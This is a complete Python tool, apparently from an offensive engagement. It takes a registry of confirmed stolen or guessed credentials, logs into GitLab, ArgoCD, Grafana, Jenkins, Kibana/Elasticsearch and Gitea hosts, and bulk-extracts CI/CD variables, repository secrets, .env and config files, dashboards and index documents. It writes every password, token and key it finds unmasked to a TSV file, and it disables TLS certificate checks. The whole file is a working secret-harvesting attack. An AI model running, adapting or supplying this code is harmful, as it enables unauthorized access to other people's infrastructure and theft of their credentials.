#!/usr/bin/env python3
"""Secret/config harvester for CONFIRMED targets (master registry).

Per-platform read-only L2 extraction:
- gitlab:   OAuth grant → user/groups/projects; CI/CD variables (cap),
            blob secret-search on top projects (cap) — read-only API
- argocd:   JWT → applications + manifests + clusters + repos (read-only)
- grafana:  basic → datasources, org users, dashboards secret-scan (cap)
- jenkins:  basic → jobs + config.xml env/inline-secret scan (cap);
            credential VALUES are encrypted — not touched (L3 Groovy gated)
- kibana:   basic → status, indices, 3-doc sample per top index (sampling)
- gitea:    basic → user/repos + top-level config files

Rules: L1/L2 read-only only (methodology.md); sampling with small caps
(Phase 4 default, no bulk extraction); no-masking on output; resume via
state file (skip hosts already harvested).

Usage:
  python3 scripts/secret_harvest.py                      # all CONFIRMED
  python3 scripts/secret_harvest.py --platform gitlab    # one platform
  python3 scripts/secret_harvest.py --host gitlab.hyva.io
  python3 scripts/secret_harvest.py --workers 8
"""
import argparse
import base64
import csv
import json
import re
import ssl
import subprocess
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path

SCRIPT_DIR = Path(__file__).parent
PROJECT_DIR = SCRIPT_DIR.parent
DATA_DIR = PROJECT_DIR / "findings" / "data"
HARVEST_DIR = PROJECT_DIR / "findings" / "harvest"
REGISTRY = DATA_DIR / "wingscloud_july_master_registry.tsv"
SECRETS_TSV = DATA_DIR / "harvest_secrets.tsv"
STATE_JSON = DATA_DIR / "harvest_state.json"

CTX = ssl.create_default_context()
CTX.check_hostname = False
CTX.verify_mode = ssl.CERT_NONE

SECRET_RE = re.compile(
    r"(?i)(password|passwd|secret|api[_-]?key|token|private[_-]?key|credential|"
    r"aws_|AKIA[0-9A-Z]{16}|-----BEGIN)")
VALUE_RE = re.compile(
    r"(?i)(password|passwd|secret|api[_-]?key|token|private[_-]?key)"
    r"[\"'\s:=]+([^\s\"',}]{6,})")

CAP_GITLAB_PROJECTS = 20       # CI vars scan cap
CAP_GITLAB_BLOB_PROJECTS = 8   # blob search cap
CAP_JENKINS_JOBS = 30
CAP_GRAFANA_DASHBOARDS = 10
CAP_KIBANA_INDICES = 5
CAP_KIBANA_DOCS = 3
CAP_GITEA_REPOS = 10


def http(url, basic=None, headers=None, data=None, method=None, timeout=25):
    h = {"User-Agent": "harvest/1.0"}
    if headers:
        h.update(headers)
    if basic:
        h["Authorization"] = "Basic " + base64.b64encode(
            f"{basic[0]}:{basic[1]}".encode()).decode()
    req = urllib.request.Request(url, data=data, headers=h, method=method)
    with urllib.request.urlopen(req, timeout=timeout, context=CTX) as r:
        body = r.read()
        ct = r.headers.get("Content-Type", "")
        if "json" in ct:
            return json.loads(body)
        return body.decode("utf-8", errors="replace")


NOISE_RE = re.compile(r"[<>{}();]|this\.|\$refs|translate=|^\s*$")


def _is_real_secret_value(v: str) -> bool:
    if not v or len(v) < 8 or len(v) > 500:
        return False
    if NOISE_RE.search(v):
        return False
    # require some entropy: mix of letters+digits or long base64-ish
    return bool(re.search(r"[a-z]", v) and re.search(r"[0-9A-Z_+/=-]{6,}", v))


def find_secrets(obj, path="", out=None, limit=200):
    """Walk JSON/text, collect (path, key, value) secret-ish entries."""
    if out is None:
        out = []
    if len(out) >= limit:
        return out
    if isinstance(obj, dict):
        for k, v in obj.items():
            p = f"{path}.{k}" if path else k
            if isinstance(v, str) and SECRET_RE.search(k) and _is_real_secret_value(v):
                out.append((p, k, v))
            else:
                find_secrets(v, p, out, limit)
    elif isinstance(obj, list):
        for i, v in enumerate(obj[:50]):
            find_secrets(v, f"{path}[{i}]", out, limit)
    elif isinstance(obj, str) and len(obj) < 20000:
        for m in VALUE_RE.finditer(obj):
            if _is_real_secret_value(m.group(2)):
                out.append((path, m.group(1), m.group(2)))
    return out


# ---------- platform handlers ----------

def h_gitlab(base, user, pw):
    data = urllib.parse.urlencode(
        {"grant_type": "password", "username": user, "password": pw}).encode()
    tok = http(base + "/oauth/token",
               headers={"Content-Type": "application/x-www-form-urlencoded"},
               data=data)["access_token"]
    H = {"Authorization": f"Bearer {tok}"}
    out = {"auth": "oauth"}
    u = http(base + "/api/v4/user", headers=H)
    out["user"] = {k: u.get(k) for k in ("id", "username", "email", "is_admin", "state")}
    try:
        groups = http(base + "/api/v4/groups?per_page=100", headers=H)
        out["groups"] = [g.get("full_path") for g in groups]
    except Exception:
        pass
    projs = http(base + "/api/v4/projects?membership=true&per_page=100&order_by=last_activity_at", headers=H)
    out["projects_count"] = len(projs)
    out["projects"] = [{"path": p["path_with_namespace"], "id": p["id"]} for p in projs[:100]]
    # CI/CD variables (cap)
    ci = []
    for p in projs[:CAP_GITLAB_PROJECTS]:
        try:
            vs = http(base + f"/api/v4/projects/{p['id']}/variables", headers=H)
            for v in vs:
                ci.append({"project": p["path_with_namespace"], "key": v.get("key"),
                           "value": v.get("value"), "masked": v.get("masked"),
                           "protected": v.get("protected")})
        except Exception:
            continue
    out["ci_variables"] = ci
    # blob secret search (cap)
    blobs = []
    for p in projs[:CAP_GITLAB_BLOB_PROJECTS]:
        for q in ("password", "api_key", "secret"):
            try:
                r = http(base + f"/api/v4/projects/{p['id']}/search?scope=blobs&search={q}&per_page=5",
                         headers=H)
                for b in r[:5]:
                    blobs.append({"project": p["path_with_namespace"], "query": q,
                                  "file": b.get("path"), "data": (b.get("data") or "")[:400]})
            except Exception:
                continue
    out["blob_hits"] = blobs
    return out


def h_argocd(base, user, pw):
    tok = http(base + "/api/v1/session",
               headers={"Content-Type": "application/json"},
               data=json.dumps({"username": user, "password": pw}).encode())["token"]
    H = {"Authorization": f"Bearer {tok}"}
    out = {"auth": "jwt"}
    apps = http(base + "/api/v1/applications", headers=H)
    out["apps"] = [a["metadata"]["name"] for a in apps.get("items", [])]
    out["clusters"] = http(base + "/api/v1/clusters", headers=H)
    out["projects"] = http(base + "/api/v1/projects", headers=H)
    manifests = []
    for name in out["apps"][:20]:
        try:
            m = http(base + f"/api/v1/applications/{name}/manifests", headers=H)
            manifests.append({"app": name, "manifests": m})
        except Exception:
            continue
    out["manifests"] = manifests
    return out


def h_grafana(base, user, pw):
    out = {}
    out["user"] = http(base + "/api/user", basic=(user, pw))
    ds = http(base + "/api/datasources", basic=(user, pw))
    out["datasources"] = ds
    try:
        out["org_users"] = http(base + "/api/org/users", basic=(user, pw))
    except Exception as e:
        out["org_users_error"] = str(e)
    hits = []
    try:
        dash = http(base + "/api/search?perpage=50", basic=(user, pw))
        for d in dash[:CAP_GRAFANA_DASHBOARDS]:
            try:
                full = http(base + f"/api/dashboards/uid/{d['uid']}", basic=(user, pw))
                s = json.dumps(full)
                if SECRET_RE.search(s):
                    hits.append({"uid": d["uid"], "title": d.get("title"),
                                 "secrets": find_secrets(full, limit=20)})
            except Exception:
                continue
    except Exception:
        pass
    out["dashboard_secrets"] = hits
    return out


def h_jenkins(base, user, pw):
    out = {}
    api = http(base + "/api/json?tree=jobs[name,url,color],numExecutors,nodeDescription",
               basic=(user, pw))
    jobs = api.get("jobs", [])
    out["jobs"] = jobs
    out["nodes"] = http(base + "/computer/api/json?tree=computer[displayName,offline]",
                        basic=(user, pw))
    try:
        out["credentials_meta"] = http(
            base + "/credentials/store/system/domain/_/api/json?tree=credentials[id,description]",
            basic=(user, pw))
    except Exception as e:
        out["credentials_meta_error"] = str(e)
    configs = []
    for j in jobs[:CAP_JENKINS_JOBS]:
        try:
            body = http(base + f"/job/{j['name']}/config.xml", basic=(user, pw))
            secrets = find_secrets(body, limit=50)
            if secrets:
                configs.append({"job": j["name"], "secrets": secrets})
        except Exception:
            continue
    out["job_config_secrets"] = configs
    return out


def h_kibana(base, user, pw):
    out = {}
    out["status"] = http(base + "/api/status", basic=(user, pw))
    host = base.split("://")[1]
    # 1) direct ES :9200 (many kibana targets expose it)
    idx = None
    for es_base in (f"https://{host}:9200", f"http://{host}:9200"):
        try:
            idx = http(es_base + "/_cat/indices?format=json&bytes=b&s=store.size:desc",
                       basic=(user, pw))
            out["es_direct"] = es_base
            break
        except Exception:
            continue
    # 2) fallback: kibana console proxy (POST wrapper, read-only GET semantics)
    if idx is None:
        try:
            r = http(base + "/api/console/proxy?path=_cat/indices%3Fformat%3Djson&method=GET",
                     basic=(user, pw),
                     headers={"kbn-xsrf": "true", "Content-Type": "application/json"},
                     data=b"")
            if isinstance(r, list):
                idx = r
                out["es_via"] = "console_proxy"
        except Exception as e:
            out["es_error"] = str(e)
    if idx is None:
        return out
    out["indices_count"] = len(idx)
    out["indices"] = [{k: i.get(k) for k in ("index", "docs.count", "store.size")}
                      for i in idx[:100]]
    samples = []
    for i in idx[:CAP_KIBANA_INDICES]:
        body = None
        for esq in (
            lambda: http((out.get("es_direct") or base) + f"/{i['index']}/_search?size={CAP_KIBANA_DOCS}",
                         basic=(user, pw)),
            lambda: http(base + f"/api/console/proxy?path={i['index']}/_search%3Fsize%3D{CAP_KIBANA_DOCS}&method=GET",
                         basic=(user, pw),
                         headers={"kbn-xsrf": "true", "Content-Type": "application/json"},
                         data=b""),
        ):
            try:
                body = esq()
                break
            except Exception:
                continue
        if not body:
            continue
        hits = [h.get("_source", {}) for h in body.get("hits", {}).get("hits", [])]
        secrets = []
        for h in hits:
            secrets.extend(find_secrets(h, limit=20))
        samples.append({"index": i["index"], "secrets": secrets[:20]})
    out["doc_samples"] = samples
    return out


def h_gitea(base, user, pw):
    out = {}
    me = http(base + "/api/v1/user", basic=(user, pw))
    out["user"] = {k: me.get(k) for k in ("login", "email", "is_admin")}
    repos = http(base + f"/api/v1/users/{me['login']}/repos?limit=50", basic=(user, pw))
    out["repos"] = [r.get("full_name") for r in repos]
    files = []
    CANDIDATE_FILES = [".env", "config.json", "config.yml", "config.yaml",
                       "docker-compose.yml", "settings.py", "config.py"]
    for r in repos[:CAP_GITEA_REPOS]:
        for fn in CANDIDATE_FILES:
            try:
                c = http(base + f"/api/v1/repos/{r['full_name']}/contents/{fn}",
                         basic=(user, pw))
                if c.get("content"):
                    files.append({"repo": r["full_name"], "file": fn,
                                  "content": base64.b64decode(c["content"]).decode(
                                      "utf-8", errors="replace")[:2000]})
            except Exception:
                continue
    out["config_files"] = files
    return out


HANDLERS = {
    "gitlab": h_gitlab,
    "argocd": h_argocd,
    "grafana": h_grafana,
    "jenkins": h_jenkins,
    "kibana": h_kibana,
    "gitea": h_gitea,
    # portainer: full L2 dump is engagement-specific (portainer_extract.py);
    # write/port it ad-hoc per engagement if needed.
}


def load_state():
    if STATE_JSON.exists():
        return json.loads(STATE_JSON.read_text())
    return {}


def save_state(state):
    DATA_DIR.mkdir(parents=True, exist_ok=True)
    STATE_JSON.write_text(json.dumps(state, indent=1))


def load_registry(platform_filter=None, host_filter=None):
    rows = []
    with REGISTRY.open() as f:
        for r in csv.DictReader(f, delimiter="\t"):
            if r["verified"] != "CONFIRMED" or not r["pw"]:
                continue
            if r["platform"] not in HANDLERS:
                continue
            if platform_filter and r["platform"] != platform_filter:
                continue
            if host_filter and r["host"] != host_filter:
                continue
            rows.append(r)
    return rows


def harvest_one(row, state):
    platform, host, user, pw, url = (row["platform"], row["host"],
                                     row["user"], row["pw"], row["url"])
    key = f"{platform}:{host}:{user}"
    if state.get(key, {}).get("status") == "done":
        return key, "skip"
    bases = []
    if url:
        proto = "https" if url.startswith("https") else "http"
        bases.append(f"{proto}://{host}")
    else:
        bases = [f"https://{host}", f"http://{host}"]
    try:
        result = None
        last_err = None
        for base in bases:
            try:
                result = HANDLERS[platform](base, user, pw)
                break
            except Exception as e:
                last_err = e
        if result is None:
            raise last_err
        outdir = HARVEST_DIR / f"{platform}__{host.replace(':', '_')}"
        outdir.mkdir(parents=True, exist_ok=True)
        (outdir / f"{user.replace('/', '_')}.json").write_text(
            json.dumps(result, ensure_ascii=False, indent=1))
        secrets = find_secrets(result, limit=500)
        with SECRETS_TSV.open("a", newline="") as f:
            w = csv.writer(f, delimiter="\t")
            for path, k, v in secrets:
                w.writerow([platform, host, user, path, k, v])
        state[key] = {"status": "done", "secrets": len(secrets),
                      "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())}
        return key, f"done ({len(secrets)} secrets)"
    except Exception as e:
        state[key] = {"status": f"fail:{type(e).__name__}",
                      "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())}
        return key, f"fail {type(e).__name__}: {str(e)[:80]}"


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--platform")
    ap.add_argument("--host")
    ap.add_argument("--workers", type=int, default=8)
    args = ap.parse_args()

    rows = load_registry(args.platform, args.host)
    print(f"[*] {len(rows)} CONFIRMED targets to harvest")
    if not SECRETS_TSV.exists():
        SECRETS_TSV.write_text("platform\thost\tuser\tpath\tkey\tvalue\n")
    state = load_state()
    HARVEST_DIR.mkdir(parents=True, exist_ok=True)

    done = fail = skip = 0
    with ThreadPoolExecutor(max_workers=args.workers) as ex:
        futs = {ex.submit(harvest_one, r, state): r for r in rows}
        for i, f in enumerate(as_completed(futs), 1):
            key, res = f.result()
            if res.startswith("done"):
                done += 1
            elif res == "skip":
                skip += 1
            else:
                fail += 1
            print(f"  [{i}/{len(rows)}] {key}: {res}", flush=True)
            if i % 10 == 0:
                save_state(state)
    save_state(state)
    print(f"[+] harvest complete: done={done} skip={skip} fail={fail} "
          f"→ {HARVEST_DIR}, secrets → {SECRETS_TSV}")


if __name__ == "__main__":
    main()
